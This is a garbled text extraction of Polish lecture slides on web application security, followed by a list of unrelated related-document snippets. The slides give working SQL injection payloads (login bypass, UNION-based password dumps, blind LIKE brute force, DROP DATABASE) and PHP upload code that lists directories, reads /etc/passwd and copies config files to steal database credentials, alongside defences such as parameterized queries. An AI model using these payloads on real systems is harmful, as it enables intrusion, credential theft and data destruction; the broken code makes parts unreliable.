Wyłą ł c ą zamy am pr p aw y pr p z r ycisk Bezpi z e pi cz c e z ńs ń two w apl a i pl k i ac a ji W W <B < O B D O Y Ataki

Wielkość: px
Rozpocząć pokaz od strony:

Download "Wyłą ł c ą zamy am pr p aw y pr p z r ycisk Bezpi z e pi cz c e z ńs ń two w apl a i pl k i ac a ji W W <B < O B D O Y Ataki"

Transkrypt

1 Bezpieczeństwo aplikacji WWW Ataki na strony internetowe i bazy danych Wyłączamy prawy przycisk <BODY oncontextmenu = "return false"> </BODY> Blokada zaznaczania tekstu tylko IE Wyłączenie przedstawiania się Apache: httpd.conf - ServerSignature On/off Ustawienie na off - nie wyświetla informacji o wersji serwera <BODY onselectstart="return false" onselect="return false" oncopy="return false"> </BODY> Ustawiamy httpd.conf (dyrektywa <Directory "C:/Program Files/EasyPHP1-8/www"> Options None </Directory> Zachowanie serwera WWW Zachowanie serwera WWW 1

2 Zachowanie serwera WWW SQL injection Eksploatacja baz danych. Sposób pośredni - dowolny interfejs do bazy danych. Całość aplikacji składa się z trzech warstw: 1. Klient. 2. Warstwa pośrednicząca. 3. Baza danych. Zwykle dane do zapytania wpisujemy w odpowiednim okienku za pomocą interfejsu, a następnie są one przetwarzane przez warstwę pośredniczącą, która konstruuje z tych danych pełnoprawne zapytanie SQL i przesyła je do bazy danych. SQL injection polega na nieautoryzowanym wykonaniu wyrażeń języka SQL. SQL injection to metoda ataku polegająca na dodaniu do zapytania wykonywanego przez warstwę pośredniczącą dodatkowego lub zmodyfikowanego zapytania SQL. Atak wykorzystuje wywołanie zapytania SQL w aplikacji, w której nie przetwarza się danych uzyskanych od użytkownika. Najczęściej polega na takim skonstruowaniu formuły SQL, by sprawdzanie wprowadzonych danych nie miało znaczenia. Zagrożenia SQL injection sposób wykonania W rezultacie może to prowadzić do: zdobycia danych, do których użytkownik nie jest uprawniony; zmodyfikowania danych, bądź dodania do bazy dodatkowych danych; obejścia mechanizmów opartych na pobieraniu danych z bazy (np. autoryzacji. Adres Formularz 2

3 Zagrożenia wynikające z użycia słowa kluczowego like Metoda get wpisanie loginu i hasła z paska adresu z użyciem słowa kluczowego like Oryginalne zapytanie w skrypcie php: select login from users where login like '$login' and haslo like '$haslo Jeżeli z paska adresu wpiszemy: =tajne Jeżeli z paska adresu wpiszemy: Przy założeniu, że nie znamy hasła. LOGOWANIE poprawne select login from users where login like admin and haslo like % Przy założeniu, że znamy poprawne dane. LOGOWANIE - poprawne Jeżeli nie znamy loginu ani hasła: Logowanie na pierwszego użytkownika z bazy select login from users where login like % and haslo like % Rezygnacja z like. Login i haslo wprowadzane z paska adresu zmienne przesyłane metodą Get. "select login from users where login='$login' and haslo='$haslo'"; "select login from users where login='$login' and haslo='$haslo'"; Próba użycia symbolu % "select login from users where login='$login' /* to co należy wpisać jako zmienną login w pasku adresu: admin /* - pozostała część zapytania zostanie pomięta 3

4 Użycie formularza $zapytanie = "select login from users where login='$login' and haslo='$ ='$haslo'"; SQL injection filozofia działania Normalny przebieg logowania $query = "SELECT * FROM uzytkownicy WHERE uzytkownik = $uzytkownik administrator AND haslo = $haslo "; tajnehaslo "; $result = mysql_query( $query ; if( mysql_num_rows ( $result > 0 { //zaloguj użykownika else { //nie można zalogować administrator tajnehaslo SQL injection filozofia działania Logowanie z wykorzystaniem SQL injection $query = "SELECT * FROM uzytkownicy WHERE uzytkownik = '$uzytkownik' administrator /* AND haslo = '$haslo' "; "; $result = mysql_query( $query ; if( mysq_num_rows ( $result > 0 { //zaloguj użykownika else { //nie można zalogować administrator /* Przy wysyłaniu formularzy bądź pobieraniu zmiennych z adresu url wszystkie cudzysłowy zarówno pojedyncze jak i podwójne są zmieniane na \' lub \". Przyczyną takiego zachowania jest opcja magic_quotes_gpc ustawiona na On w php.ini. Stosuje się ją aby zabezpieczyć aplikację przed atakiem SQL Injection w razie, gdyby programista gdzieś zapomniał o przefiltrowaniu danych od użytkownika, które potem wykorzystywane są w zapytaniach SQL. Aby usunąć ze zmiennych POST czy GET niepotrzebne znaki backslash stosujemy funkcję stripslashes(. Usuwa ona znaki ucieczki '\'' z ciągu podanego jako argument. Gdy opcja magic_quotes_gpc w php.ini jest ustawiona na On to PHP automatycznie przepuszcza wszystkie zmienne z tablic superglobalnych takich jak POST czy GET przez funkcję addslashes(. Manipulacja stripslashes i addslashes. magic_quotes_gpc = On / Off Formularz zbudowany wewnątrz php z użyciem funkcji echo (znaki ucieczki. $username1 = stripslashes($login; $username2 = addslashes($login; SELECT * FROM users WHERE `username` = 'admin' /*' AND `password` = '' SELECT * FROM users WHERE `username` = 'inny' OR 1=1 /*' AND `password` = 4

5 Zapytanie zawsze prawdziwe ostatecznie pojawią się informacje o ostatnim użytkowniku SQL injection admin' /* SELECT * FROM users WHERE `username` = 'admin' /*' AND `password` = ' ' admin' OR 1=1 /* SELECT * FROM users WHERE `username` = 'inny' OR 1=1 /*' AND `password` = ' ' magic_quotes_gpc = Off/On, stripslashes Ataki SQL injection typu Nie ma takiego użytkownika UNION SELECT Unia pozwala na zsumowanie zbiorów krotek dwóch lub więcej relacji (bez powtórzeń - zgodnie z teorią mnogości. Warunkiem poprawności tej operacji jest zgodność liczby i typów atrybutów (kolumn sumowanych relacji. Przykład przedstawiony poniżej sumuje zbiory pracowników i właścicieli okrojone do imienia i nazwiska (za pomocą projekcji, w celu uzyskania informacji o wszystkich ludziach powiązanych z firmą SELECT imie, nazwisko FROM pracownicy UNION SELECT imie, nazwisko FROM wlasciciele ; W przypadku użycia UNION zostają wyświetlone wiersze zwracane przez składowe zapytania, przy czym zostają usunięte wiersze powtarzające się. Domyślną opcją dla Union jest distinct gdy chcemy pobrać wszystkie dane należy użyć opcji all. Operacje mnogościowe na wynikach zapytań Filmy id_filmu tytul rok_produkcji cena 1 Wesele Ghostbusters Terminator SELECT TYTUL FROM FILMY UNION SELECT NAZWISKO FROM KLIENCI; tytul Ghostbusters Kowalski Nowak Terminator Wesele (5 rows Klienci id_klienta imie nazwisko 1 Jan Kowalski 2 Anna Nowak UNION suma mnogościowa z eliminacją duplikatów UNION ALL suma mnogościowa bez eliminacji duplikatów 5

6 Cel pobranie hasła dla wybranego użytkownika "select login from users where id = $id limit 1"; id=1 and 1=0 union select haslo from users zapytanie zwraca hasło pierwszego użytkownika z bazy pierwsze zapytanie jest zawsze fałszywe i nie ma wpływu na zwracane dane. select login from users where id = 1 and 1=0 union select haslo from users limit 1. Jeżeli chcemy wyświetlić hasło dowolnego użytkownika z bazy należy wpisać select login from users where id = 1 and 1=0 union select haslo from users where id = 2 limit 1. Metodą obrony przed tego typu atakami może być użycie funkcji intval. Zamienia ona podany argument na liczbę: $id = intval($_get['id']; Z id=1 and 1=0 union select haslo from users robi się 0 lub 1 ((1 1 nie mamy poprawy sytuacji Cel pobranie wszystkich użytkowników z bazy wraz z ich hasłami select login from users where login like '$login $login%' %' limit 2 Wyświetla dwóch użytkowników z bazy danych jeżeli się nie poda nic to będzie to dwóch pierwszych, jeżeli się poda literę (wzorzec pierwszych dwóch spełniających kryteria. and 1=2 union select login from users/* przed znakiem procenta pojawia się komentarz dalsza część skryptu nie jest brana pod uwagę and 1=2 union select haslo from users/* Użycie funkcji concat łączy dwa atrybuty obchodzimy ograniczenie wynikające z pierwszego zapytania. Można pomiędzy loginem a haslem wstawić dwukropek char(58.?login=1' and 1=2 union select concat concat(login, (login, char(58, haslo haslo from users/* Czy można dodać do drugiej części zapytania login, haslo 6

7 Cel ataku - rozpoznawanie struktury tabeli Select login, coś_jeszcze... from users where login like '$login% Zapytanie, które się wykonuje oczywiście nigdy nie będzie widoczne dla użytkownika. Spróbujmy sobie je wyobrazić: select (określona jednak nieznana liczba kolumn from users where login = $login% oraz ewentualnie dalsza część Jeżeli w pierwszej części zapytania jest jeden atrybut zapytanie wykona się poprawnie, jeśli nie pojawi się błąd o niezgodności liczby kolumn w dwóch zapytaniach. Testujemy kolejno:?login=' and 1=2 union select 1,2,3,4 /* To zapytanie wykona się poprawnie wyświetli numer pozycji, na której jest login.?login=' and 1=2 union select 1,login,3,4 from users/* Czy da się określić liczbę kolumn w zapytaniu, czy da się wyłowić wszystkich użytkowników oraz ich hasła. Wyświetli wszystkich użytkowników z bazy. select (tego nie znamy from users where login = $login% zamiast zmiennej login wpisujemy:?login=' and 1=2 union select 1 /* Wyświetli wszystkich użytkowników z bazy oraz ich hasła.?login=1' and 1=2 union select 1,concat(login,char 1,concat( login,char(58, (58, haslo,3,4 haslo,3,4 from users/*?login=' and 1=2 union select 1,login,3,4 from users/* Wyświetli wszystkich użytkowników z bazy.?login=1' and 1=2 union select 1,concat(login, char(58, char(58,haslo haslo,3,4,3,4 from users/* Wyświetli wszystkich użytkowników z bazy oraz ich hasła. %20select%201,concat(login,%20char(58,%20haslo%20,3,4% 20from%20users/* Skrypt pobiera nazwę użytkownika (login i sprawdza czy istnieje on w bazie danych. Celem ataku jest poznanie hasła wybranego (istniejącego użytkownika. Nie można użyć jak poprzednio union select nie znamy nazw atrybutów skrypt wyświetla tylko login. Nie znamy treści zapytania możemy się jednak domyślać select from where login ='$login' Pola zakropkowane są nieznane, dane od użytkownika są wstawiane w miejsce $login: select from where login ='admin' ='admin' and haslo like '%' /* Nic się nie zmieniło mamy potwierdzenie, że użytkownik admin istnieje użycie % - nie sprawdza hasła. Teraz można zastosować metodę bruce force: select from where login ='admin' and haslo like 'a%' /* jeżeli poinformuje nas że użytkownik istnieje oznacza to że hasło rozpoczyna się na literę a, i tak aż do skutku, kolejne litery na koniec powinniśmy usunąć znak %. 7

8 Jak unikać SQL Injection 1. Analizowanie wejścia - wszystkie dane pochodzące z zewnątrz aplikacji powinny być filtrowane. Procedury powinny przepuszczać tylko te znaki/ciągi, które są dopuszczalne w danym kontekście. Szczególnie ważne jest wyszukiwanie słów kluczowych, takich jak SELECT. Znaków takich jak cudzysłów, apostrof czy podwójny myślnik. Oczyszczanie wczytanego ciągu znaków nie zawsze jest jednak rzeczą prostą, a przynajmniej czasami, może być uciążliwe (SQL jest językiem rozbudowanym, istotny jest również kontekst, w którym znaki zostają wczytane. 2. Zarządzanie komunikatami o błędach - zwykły użytkownik nie powinien otrzymywać komunikatów, mogących zdradzać szczegóły budowy bazy danych. Jak unikać SQL Injection Ograniczanie uprawnień użytkowników - przy nadawaniu uprawnień należy stosować zasadę najmniejszych przywilejów. W fazie projektowania należy zdefiniować najmniejszy zestaw informacji niezbędny do wykonania danego zadania. Szczególną uwagę należy zwrócić na prawa dostępu do wewnętrznych struktur bazy danych. Oddzielenie danych od kodu Unikanie dynamicznie generowanego kodu SQL jest najlepszym rozwiązaniem. Większość interfejsów baz danych zapewnia taką możliwość (parametry wiązane - PHP, parametry nazwane JDBC. Wyrażenie powinno najpierw zostać "przygotowane" i czekać w bazie na wyliczenie z podanym parametrem, który już nie może zostać pomylony z kodem. SQL injection - zagrożenia wyświetli wszystkich użytkowników a ; SELECT * FROM users; -- eksportuje listę użytkowników a ; SELECT users INTO OUTFILE '/tmp/result.txt' FROM users; -usunie systemową bazę danych a ; DROP DATABASE system; -- zmieni hasło administratora a ; UPDATE users SET password = aaa WHERE login = administrator ; -- Upload plików na witrynie WWW usuwa tabelę użytkowników a ; DROP TABLE users; -- zmieni hasło dostępu do bazy danych a ; ALTER USER dbowner IDENTIFIED BY NoweHaslo; -- 8

9 Założenia strona napisana w PHP z możliwością wgrywania własnych plików np. fora dyskusyjne, strony studenckie do wymiany materiałów dydaktycznych lub jeżeli posiadamy stronę WWW na atakowanym serwerze; Na stronę wgrywamy dowolny plik z rozszerzeniem.php php;; Plik zawiera tylko jedną instrukcję (np. plik.php plik.php: : <? phpinfo(; phpinfo (;?> W chwili jego wywołania wykona się funkcja. Przykład 2. <? if ($_SERVER['REMOTE_ADDR'] == 'adres' include(' else echo ':';?> W chwili jego wywołania wykona się powyższa instrukcja (oczywiście można umieścić całość właściwego kodu bezpośrednio tu ale nie mamy możliwości swobodnego manipulowania zawartością; Dodatkowo zabezpieczamy się przed dostępem do naszego skryptu przez osoby trzecie. Ważne jest, aby plik dołączany z zewnątrz poprzez polecenie include include miał rozszerzenie inne niż.php.php,, po to, by nie został wykonany po stronie serwera, z którego ma być dołączany. Skoro można wykonać dowolny skrypt php z zewnętrznego adresu: // funkcja wyświetlająca prawa dostępu do pliku function showperms showperms($file ($file { $perms = fileperms fileperms($file; ($file; if (($ perms & 0xC000 == 0xC000 0xC000 $info = 's'; elseif (($ perms & 0xA000 == 0xA000 0xA000 $info = 'l'; elseif (($ perms & 0x8000 == 0x8000 0x8000 $info = ''-'; elseif (($ perms & 0x6000 == 0x6000 0x6000 $info = 'b'; elseif (($ perms & 0x4000 == 0x4000 0x4000 $info = 'd'; elseif (($ perms & 0x2000 == 0x2000 0x2000 $info = 'c'; elseif (($ perms & 0x1000 == 0x1000 0x1000 $info = 'p'; else $info = 'u'; & 0x0100? 'r 'r' : ''-'; $info $info & 0x0040? & 0x0800? & 0x0020? 'r 'r' : ''-'; & 0x0010? 'w' : ''-'; & 0x0008? & 0x0400? & 0x0004? 'r 'r' : ''-'; & 0x0002? 'w' : ''-'; & 0x0001? & 0x0200? echo $info $info; ; // funkcja listująca dany katalog wraz z prawami dostępu do plików (wykorzystuje powyższą funkcję showperms function showfiles showfiles($ ($dir dir { $handle = opendir opendir($dir; ($dir; echo "<table>"; while ($file = readdir readdir($handle ($handle { echo "<tr "<tr><td>".$file."</td><td>"; ><td>".$file."</td><td>"; showperms($ showperms ($dir.$file dir.$file; ; echo "</td></tr "</td></tr>"; >"; echo "</table>";.= & 0x0080? 'w' : ''-'; 's' : 'x' : & 0x0800?'S :' 0x0800?'S :'-'; 's' : 'x' : : & 0x0400?'S : ''-'; 't' : 'x' : : & 0x0200?'T : ''-'; 9

10 a Przykład użycia powyższych funkcji: //funkcja wyświetlająca plik function readf readf($ ($myfile myfile { $fh = fopen fopen($ ($myfile myfile,, 'r'; $thedata = fread fread($ ($fh fh,, filesize($ filesize ($myfile myfile; ; fclose($ fclose ($fh fh; ; echo $thedata $thedata; ; $path = './'; showfiles($path; Zmienną $path możemy zmieniać kolejno na: '../', '../../', '../../../' showfiles($ showfiles ($path path funkcja prezentująca pliki i ich atrybuty z katalogu bieżącego, w którym umieściliśmy plik.php.php.. Problematyka praw dostępu do plików i katalogów z poziomu WWW chamod.. chamod Upload plików na witrynie WWW Pierwszym celem jest możliwość penetracji katalogów i plików; <? $path = './'; $path = '../'; $path =../../'; showfiles($ showfiles ($path path; ; showfiles($ showfiles ($path path funkcja prezentująca pliki i ich atrybuty z katalogu bieżącego, w którym umieściliśmy plik.php.php.. Problematyka praw dostępu do plików i katalogów z poziomu WWW chamod chamod.. Każdy plik, do którego mamy prawo czytania, możemy wyświetlić przy pomocy funkcji readf. Każdy plik, do którego mamy prawo czytania, możemy wyświetlić przy pomocy funkcji readf. Jeśli znajdziemy w obrębie katalogu strony katalog z prawami dostępu 777, możemy do niego kopiować dowolne pliki, do których mamy prawo czytania, np. pliki strony z rozszerzeniem.php, plik /etc/passwd, a następnie możemy przeglądać te pliki z poziomu przeglądarki. Jeśli znajdziemy w obrębie katalogu strony katalog z prawami dostępu 777, możemy do niego kopiować dowolne pliki, do których mamy prawo czytania, np. pliki strony z rozszerzeniem.php, plik /etc/passwd, a następnie możemy przeglądać te pliki z poziomu przeglądarki. Jeśli dana strona korzysta z bazy danych, w plikach.php możemy odnaleźć funkcję odwołujące się do bazy danych wraz z loginem, hasłem i nazwą bazy. Stąd już krótka droga do poznania struktury bazy oraz przeczytania informacji w niej zapisanych. Jeśli dana strona korzysta z bazy danych, w plikach.php możemy odnaleźć funkcję odwołujące się do bazy danych wraz z loginem, hasłem i nazwą bazy. Stąd już krótka droga do poznania struktury bazy oraz przeczytania informacji w niej zapisanych. 10

11 Upload plików na witrynie WWW Źródło strony Alternatywna metoda pobranie interesujących nas plików (nie jesteśmy w stanie odczytać zawartości pików z rozszerzeniem.php.php wykonują się one po stronie serwera, a do przeglądarki zwracany jest tylko wynik nie odczytamy np. haseł dostępu do bazy. <? $dir = './'; copy($ copy ($dir.'config.php dir.'config.php', ', 'test.txt 'test.txt'; ';?> Mając login i hasło do bazy, można wykonać dowolne zapytanie sql sql;; function czytajbaze czytajbaze( ( { $polacz=mysql_connect polacz=mysql_connect(" ("localhost localhost", ", "tajna", "tajne" or die("połączenie die ("Połączenie z baz. danych nie jest możliwe."; mysql_select_db(" mysql_select_db ("baza",$polacz baza",$polacz or die die("wystąpił ("Wystąpił błąd."; $zapytanie = "select "select * FROM users users"; "; $wykonaj = mysql_query mysql_query($zapytanie ($zapytanie or die die("wystąpił ("Wystąpił nieoczekiwany błąd."; while ($ ($rzad rzad = mysql_fetch_array mysql_fetch_array($wykonaj ($wykonaj { echo $rzad $rzad['login'].' ['login'].' <b>'.$rzad <b>'.$rzad[' ['haslo haslo'].'</ '].'</b><br b><br>'; >'; Mając login i hasło do bazy, można wykonać dowolne zapytanie sql sql;; function czytajbaze czytajbaze( ( { $polacz=mysql_connect polacz=mysql_connect(" ("localhost localhost", ", "tajna", "tajne" or die("połączenie die ("Połączenie z baz. danych nie jest możliwe."; Protokół TCP/IP nie posiada wbudowanych funkcji szyfrujących. mysql_select_db(" mysql_select_db ("baza",$polacz baza",$polacz or die die("wystąpił ("Wystąpił błąd."; $zapytanie = drop database dbsql dbsql"; "; Także HTTP, korzystający z TCP/IP nie zapewnia bezpieczeństwa danych. Wszystkie strony internetowe oraz dane są przesyłane w sposób jawny i narażone tym samym na śledzenie i przechwytywanie. W celu stworzenia bezpiecznego połączenia pomiędzy komputerami stosuje się protokół SSL, który zapewnia szyfrowanie na zadowalającym poziomie. Szyfrowanie przebiega z zastosowaniem klucza prywatnego i publicznego. 11

12 Przesyłanie danych z formularzy. Problematyka ukrywania kodu. Można je przesyłać na dwa sposoby. Jeśli potencjalny włamywacz nie wie co skrypt robi, jaka jest architektura naszej bazy danych, może tylko zgadywać. Poprzez post i get. Jeśli serwery WWW i PHP pracują prawidłowo nie ma możliwości podejrzenia kodu PHP strony poprzez stronę internetową. Co jednak gdy serwer PHP lub WWW będzie miał awarię? Jeśli serwer WWW nieprawidłowo zainstaluje PHP to może zamiast wykonania skryptu wyświetlić jego kod. Należy zatem zadbać by pliki zawierające login i hasło do bazy danych nie były dostępne z poziomu serwera WWW, a do skryptu dołączane poprzez funkcję include. <?php Odradza się stosowanie get ponieważ dane wysyłane tą metodą są jawnie dołączone do adresu URL. Np. po wysłaniu swojego hasła z formularza poprzez get wyświetli się adres: Pobierane od użytkownika hasło poprzez formularz, należy zastosować opcję password password.. Aby zapewnić bezpieczeństwo skryptom należy zawsze inicjować zmienne oraz korzystać z tablic (register_globals register_globals: : include("../../../dane.php";?> $HTTP_COOKIE_VARS Tak dołączony plik nie będzie dostępny z poziomu adresu URL w przypadku nieprawidłowego działania serwera WWW lub PHP. $HTTP_POST_VARS HTTP_POST_VARS,, $_POST Można też do ochrony skryptu zastosować funkcję error_reporting(0. Przy takim ustawieniu nie zostanie wyświetlony żaden błąd w trakcie wykonania skryptu i potencjalny włamywacz nie pozna nazwy funkcji czy pliku jaki używamy. $HTTP_GET_VARS HTTP_GET_VARS,, $_GET a nie globalnych zmiennych. Zabezpieczymy się przed ingerencją włamywacza poprzez inicjowanie zmiennych dzięki adresowi URL. 12

6. Bezpieczeństwo przy współpracy z bazami danych

6. Bezpieczeństwo przy współpracy z bazami danych 6. Bezpieczeństwo przy współpracy z bazami danych 6.1. Idea ataku SQL injection Atak znany jako SQL injection jest możliwy wtedy, gdy użytkownik ma bezpośredni wpływ na postać zapytania wysyłanego do bazy

Bardziej szczegółowo

Autor: Joanna Karwowska

Autor: Joanna Karwowska Autor: Joanna Karwowska Wygodniejszym i wydajniejszym sposobem przechowywania i korzystania z dużej ilości danych zapisanych na serwerze jest współpraca z relacyjną bazą danych. 2 1. Utworzyć bazę danych.

Bardziej szczegółowo

Wykład 5: PHP: praca z bazą danych MySQL

Wykład 5: PHP: praca z bazą danych MySQL Wykład 5: PHP: praca z bazą danych MySQL Architektura WWW Podstawowa: dwuwarstwowa - klient (przeglądarka) i serwer WWW Rozszerzona: trzywarstwowa - klient (przeglądarka), serwer WWW, serwer bazy danych

Bardziej szczegółowo

PHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych:

PHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych: PHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych: MySQL moduł mysql albo jego nowsza wersja mysqli (moduł mysqli ma dwa interfejsy: proceduralny i obiektowy) PostgreSQL Oracle MS

Bardziej szczegółowo

Lekcja 10. Uprawnienia. Dołączanie plików przy pomocy funkcji include() Sprawdzanie, czy plik istnieje przy pmocy funkcji file_exists()

Lekcja 10. Uprawnienia. Dołączanie plików przy pomocy funkcji include() Sprawdzanie, czy plik istnieje przy pmocy funkcji file_exists() Paweł Gmys PHP strona 1 Lekcja 10 Uprawnienia Aby skrypt PHP mógł odwołać się do pliku, musi mieć odpowiednie uprawnienia. Szczegóły są zależne od serwera. Najczęściej chyba skrypt ma uprawnienia takie,

Bardziej szczegółowo

Baza danych do przechowywania użytkowników

Baza danych do przechowywania użytkowników System logowania i rejestracji jest bardzo przydatną funkcjonalnością na każdej stronie. Umożliwia sprawną identyfikację i zarządzanie użytkownikami. Strona ze skryptem logowania nabiera dużej wartości.

Bardziej szczegółowo

Projektowani Systemów Inf.

Projektowani Systemów Inf. Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych

Bardziej szczegółowo

Instytut Mechaniki i Inżynierii Obliczeniowej Wydział Mechaniczny Technologiczny Politechnika Śląska

Instytut Mechaniki i Inżynierii Obliczeniowej   Wydział Mechaniczny Technologiczny Politechnika Śląska Instytut Mechaniki i Inżynierii Obliczeniowej www.imio.polsl.pl fb.com/imiopolsl @imiopolsl Wydział Mechaniczny Technologiczny Politechnika Śląska Laboratorium 1 Wprowadzenie, podstawowe informacje o obsłudze

Bardziej szczegółowo

CREATE USER

CREATE USER Temat: Administrowanie użytkownikami bazy danych. Po instalacji serwera MYSQL dostępne jest konto o nazwie root. Domyślnie nie ma ono przypisanego hasła, aczkolwiek podczas procesu konfiguracji jest możliwość

Bardziej szczegółowo

Wykład 6: PHP: praca z bazą danych MySQL, cz.2

Wykład 6: PHP: praca z bazą danych MySQL, cz.2 Wykład 6: PHP: praca z bazą danych MySQL, cz.2 Połączenie z bazą danych (cba.pl) Uwaga ogólna: Gdy korzystamy z usługi hostingowej: usługodawca poda nam nasz login, hasło i nazwę bazy danych (przy bezpłatnej

Bardziej szczegółowo

Pawel@Kasprowski.pl Języki skryptowe - PHP. PHP i bazy danych. Paweł Kasprowski. pawel@kasprowski.pl. vl07

Pawel@Kasprowski.pl Języki skryptowe - PHP. PHP i bazy danych. Paweł Kasprowski. pawel@kasprowski.pl. vl07 PHP i bazy danych Paweł Kasprowski pawel@kasprowski.pl Użycie baz danych Bazy danych używane są w 90% aplikacji PHP Najczęściej jest to MySQL Funkcje dotyczące baz danych używają języka SQL Przydaje się

Bardziej szczegółowo

Wyrażenie include(sciezka_do_pliku) pozwala na załadowanie (wnętrza) pliku do skryptu php. Plik ten może zawierać wszystko, co może się znaleźć w

Wyrażenie include(sciezka_do_pliku) pozwala na załadowanie (wnętrza) pliku do skryptu php. Plik ten może zawierać wszystko, co może się znaleźć w Wyrażenie include(sciezka_do_pliku) pozwala na załadowanie (wnętrza) pliku do skryptu php. Plik ten może zawierać wszystko, co może się znaleźć w obrębie skryptu. Wyrażenia include() i require() są niemal

Bardziej szczegółowo

Aplikacje WWW - laboratorium

Aplikacje WWW - laboratorium Aplikacje WWW - laboratorium PHP. Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, obsługa formularzy oraz zmiennych

Bardziej szczegółowo

Instalacja MySQL. http://dev.mysql.com/downloads/mysql/5.0.html#downloads

Instalacja MySQL. http://dev.mysql.com/downloads/mysql/5.0.html#downloads Instalacja MySQL Baza MySQL tworzona jest przez Szwedzką firmę MySQL AB strona domowa projektu to: www.mysql.com Wersję bezpłatną (różniącą się od komercyjnej brakiem wsparcia technicznego, nośnika i podręcznika)

Bardziej szczegółowo

Dokumentacja interfejsu HTTPD. Platforma BSMS.PL Instrukcja podłączenia po przez http

Dokumentacja interfejsu HTTPD. Platforma BSMS.PL Instrukcja podłączenia po przez http Dokumentacja interfejsu HTTPD Platforma BSMS.PL Instrukcja podłączenia po przez http Dokumentacja interfejsu httpd (strona 2) SPIS TREŚCI 1. Zawartość dokumentu str.3 2. Informacje ogólne 2.1 Zastosowanie

Bardziej szczegółowo

ZAAWANSOWANE BAZY DANYCH I HURTOWNIE DANYCH MySQL, PHP

ZAAWANSOWANE BAZY DANYCH I HURTOWNIE DANYCH MySQL, PHP ZAAWANSOWANE BAZY DANYCH I HURTOWNIE DANYCH MySQL, PHP Zad. 1 Dla każdego zamówienia wyznaczyć jego wartość. Należy podać numer zamówienia oraz wartość. select z.id_zamowienia, sum(ilosc*cena) as wartosc

Bardziej szczegółowo

Dokumentacja smsapi wersja 1.4

Dokumentacja smsapi wersja 1.4 Dokumentacja smsapi wersja 1.4 1. Wprowadzenie Platforma smsapi została skierowana do użytkowników chcących rozbudować swoje aplikacje o system wysyłania smsów. Aplikacja ta w prosty sposób umożliwia integrację

Bardziej szczegółowo

Internetowe bazy danych

Internetowe bazy danych Wyższa Szkoła Technologii Teleinformatycznych w Świdnicy Internetowe bazy danych wykład 6 dr inż. Jacek Mazurkiewicz e-mail: Jacek.Mazurkiewicz@pwr.wroc.pl Kontrola dostępu

Bardziej szczegółowo

Języki programowania wysokiego poziomu. PHP cz.4. Bazy danych

Języki programowania wysokiego poziomu. PHP cz.4. Bazy danych Języki programowania wysokiego poziomu PHP cz.4. Bazy danych PHP i bazy danych PHP może zostać rozszerzony o mechanizmy dostępu do różnych baz danych: MySQL moduł mysql albo jego nowsza wersja mysqli (moduł

Bardziej szczegółowo

Bazy danych. Wykład IV SQL - wprowadzenie. Copyrights by Arkadiusz Rzucidło 1

Bazy danych. Wykład IV SQL - wprowadzenie. Copyrights by Arkadiusz Rzucidło 1 Bazy danych Wykład IV SQL - wprowadzenie Copyrights by Arkadiusz Rzucidło 1 Czym jest SQL Język zapytań deklaratywny dostęp do danych Składnia łatwa i naturalna Standardowe narzędzie dostępu do wielu różnych

Bardziej szczegółowo

DECLARE VARIABLE zmienna1 typ danych; BEGIN

DECLARE VARIABLE zmienna1 typ danych; BEGIN Procedury zapamiętane w Interbase - samodzielne programy napisane w specjalnym języku (właściwym dla serwera baz danych Interbase), który umożliwia tworzenie zapytań, pętli, instrukcji warunkowych itp.;

Bardziej szczegółowo

Hosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas)

Hosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Hosting WWW Bezpieczeństwo hostingu WWW Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Najgroźniejsze ataki na serwer WWW Najgroźniejsze ataki na serwer WWW Cross-site scripting (XSS) SQL injection Denial

Bardziej szczegółowo

Sprawdzenie czy połączenie przebiegło poprawnie if (mysqli_connect_errno()) { echo Błąd; Połączenie z bazą danych nie powiodło się.

Sprawdzenie czy połączenie przebiegło poprawnie if (mysqli_connect_errno()) { echo Błąd; Połączenie z bazą danych nie powiodło się. Za operacje na bazie odpowiada biblioteka mysqli (i jak improved). Posiada ona interfejs obiektowy jak i proceduralny. Podłączenie do bazy (obiektowo) mysqli:: construct() ([ string $host [, string $username

Bardziej szczegółowo

Aplikacje WWW - laboratorium

Aplikacje WWW - laboratorium Aplikacje WWW - laboratorium PHP + bazy danych Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, współpraca PHP z bazami

Bardziej szczegółowo

Wydział Elektrotechniki, Informatyki i Telekomunikacji Instytut Informatyki i Elektroniki

Wydział Elektrotechniki, Informatyki i Telekomunikacji Instytut Informatyki i Elektroniki Wydział Elektrotechniki, Informatyki i Telekomunikacji Instytut Informatyki i Elektroniki Instrukcja do zajęć laboratoryjnych Przetwarzanie i organizowanie danych : bazy danych Nr ćwiczenia 10 Temat Aplikacje

Bardziej szczegółowo

5. Współpraca z bazą danych MySQL

5. Współpraca z bazą danych MySQL 5. Współpraca z bazą danych MySQL 5.1. Informacje ogólne Język PHP posiada obsługę wielu relacyjnych baz danych, jedną z najpopularniejszych jest baza MySQL. PHP pozwala na pełną współpracę z bazą. Praca

Bardziej szczegółowo

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa

SQL injection. Metody włamań do systemów komputerowych p. 1/13. Bogusław Kluge, Karina Łuksza, Ewa Makosa Metody włamań do systemów komputerowych SQL injection Bogusław Kluge, Karina Łuksza, Ewa Makosa b.kluge@zodiac.mimuw.edu.pl, k.luksza@zodiac.mimuw.edu.pl, e.makosa@zodiac.mimuw.edu.pl Metody włamań do

Bardziej szczegółowo

Zagadnienia. Konstrukcja bibliotek mysql i mysqli w PHP. Dynamiczne generowanie stron. Połączenie, zapytanie i sesja

